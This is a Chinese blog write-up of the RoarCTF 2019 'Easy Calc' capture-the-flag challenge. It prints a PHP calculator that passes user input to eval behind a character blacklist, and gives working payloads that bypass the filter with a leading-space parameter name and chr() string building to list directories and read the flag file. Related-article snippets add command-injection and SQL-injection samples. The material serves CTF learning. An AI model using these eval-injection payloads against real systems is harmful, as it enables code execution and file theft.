[RoarCTF 2019]Easy Calc 空格加变量绕过waf,字符拼接绕过黑名单

最新推荐文章于 2023-03-26 16:14:32 发布
最新推荐文章于 2023-03-26 16:14:32 发布
阅读量215 收藏
点赞数
文章标签: php 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61774705/article/details/125121534
版权 
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

利用PHP的字符串解析特性Bypass 

利用空格加num 绕过waf检测num的值

利用scandir()列出目录和文件,var_dump()用于输出

scandir()函数返回指定目录中的文件和目录的数组。
scandir(/)相当于ls /
var_dump()相当于echo

利用file_get_contents()读取并输出文件内容

例如 file_get_contents(/flag.php),读取/flag.php的代码

calc.php? num=var_dump(scandir(chr(47))) 

 calc.php? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

 

T1M@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
mysql hypot_几道web题简单总结
weixin_42516104的博客
01-27 196
拖了好长时间,总结一下这一段时间做的几道值得记录一下的题目,有的没做出来,但是学习到了新的东西1.homebrew event loopddctf的一道题目,学到了python eval函数的用法,首先分析题目:#-*- encoding: utf-8 -*-#written in python 2.7__author__ = 'garzon'from flask importFlask, ses...
Microsoft-Applocker-Bypass:绕过微软applocker的新技术
06-03
这一发现: 当 AppLocker 配置为在白名单模式下工作(例如:只允许运行指定的程序)时,可以绕过“AppLocker”的保护。 例如,如果只有 [mspaint.exe、notepad.exe、calc.exe] 被签名并允许运行 - 仍然可以运行其他...
[RoarCTF 2019]Easy Calc1
最新发布
pie002的博客
03-26 61
file_get_contents() 函数把整个文件读入一个字符串中,由于要字符串形式,但""已经被过滤,因此我们继续用chr()来代替/f1agg。在num前一个空格waf检测到的就是" num"而不是"num",但在PHP中会自动转换为$num的变量绕过waf。//scandir()列出目录中的文件和目录。用chr(47)来代替/,chr()从不同的 ASCII 值返回字符。查看源代码,我们发现有一个calc.php文件。过滤了"" '' \。
[RoarCTF 2019]Easy Calc
u011250160的博客
12-09 136
审题发现calc.php 访问calc.php发现源码 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blac
初步学习http请求走私
m0_62422842的博客
09-02 1103
最先开始接触到http请求走私是在今年的iscc线上赛的一道题目,当时因为没有题目环境等种种原因没有复现这道题目,所以这次通过这篇文章了解什么是http请求走私攻击。
纯CSS3夜空流星划过背景特效
07-31
在本文中,我们将深入探讨如何使用CSS3的关键帧(keyframes)属性来创建一个令人惊叹的"纯CSS3夜空流星划过背景特效"。这个特效利用了CSS3的先进功能,无需JavaScript或其他编程语言,就能在网页背景上实现动态的...
calc_BCD译码的实现_移位3算法_4321_
09-29
简易计算器支持简单的四则运算(支持负数),在此基础上,添了连续运算功能。1、计算器通过矩阵键盘模拟按键输入,并通过数码管显示。2、计算器有“0、1、2、3、4、5、6、7、8、9、+、-、*、/、C、=” 共16 个按键。...
Calc Easy-开源
05-29
【标题】"Calc Easy-开源"是一个开源软件项目,它提供了一个相当简单的快速计算器的实现。这个项目的重点在于它的开源特性,意味着源代码是公开的,任何人都可以查看、学习、修改或分发这个计算器的代码。开源软件的...
calc:终端内的计算器,以防万一您错过了系统一
02-04
2. **解析与词法分析**:在calc中,输入的数学表达式需要被解析成内部表示,这涉及到词法分析(将字符流转换为标记或符号)和语法分析(将标记序列转换为抽象语法树)。这通常通过编写解析器和词法分析器(或使用像`...
BUUCTF(web刷题记录一)
nareku的博客
04-16 8691
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2212
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
CTF中一些绕过
qq_41996851的博客
04-23 2439
PHP 主要体现在序列化中; php中的类会有构造函数和析构函数,也还有内置的一些其他语言没有的函数: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; // 构造函数,声明对象时触发 public function __construct($username,$password){
BUUCTF-Web题解(一)
flying_bird2019的博客
12-20 1450
ping ping ping 参考其他wp: 链接 执行系统命令 先输入:?ip=127.0.0.1;ls 输出: flag.php index.php ?ip=127.0.0.1;cat flag.php fxck your space! 过滤了空格 空格可以用 ${IFS} $IFS$1 //$其他数字都可以 < <> {cat,flag.php} %09 代替 ?ip=127.0.0.1;cat,flag.php fxck your flag! flag被过滤 读一下index.p
【BUUCTF】 [RoarCTF 2019]Easy Calc 详细题解笔记 Writeup
algae
08-13 1985
【BUUCTF】 [RoarCTF 2019]Easy Calc一. playload1.scandir("/")函数读取目录,/ 被过滤所以换为chr(47)绕过(1).同1,但空格换为+(2).这里的chr(47)也可以换为hex2bin(dechex(47))(3).(4).(5).2.http走私绕过WAF4.5.二. 基础知识1.利用PHP的字符串解析特性Bypass2.[PHP chr() 函数:chr(ascii)](https://www.w3school.com.cn/php/func_s
从一道CTF题到HTTP请求走私攻击
蚁景网安学院
11-03 524
01前言 最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。02Roar...
BUU刷题记录——5
weixin_43610673的博客
09-21 1508
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
BUUCTF刷题记录(3)
bmth666的博客
03-20 3298
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 547
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语
[roarctf 2019]easy calc
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和密后的标志,需要我们破解密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到密算法的相关代码。在这个程序中,密算法使用了一种简单的替换算法,它会将输入字符串中的每个字符替换成固定的字符。 我们只需要编写一个解密程序,使用相同的替换表将密后的标志还原成原始标志。一旦还原了标志,我们就可以提交它来获得得分。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

T1M@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值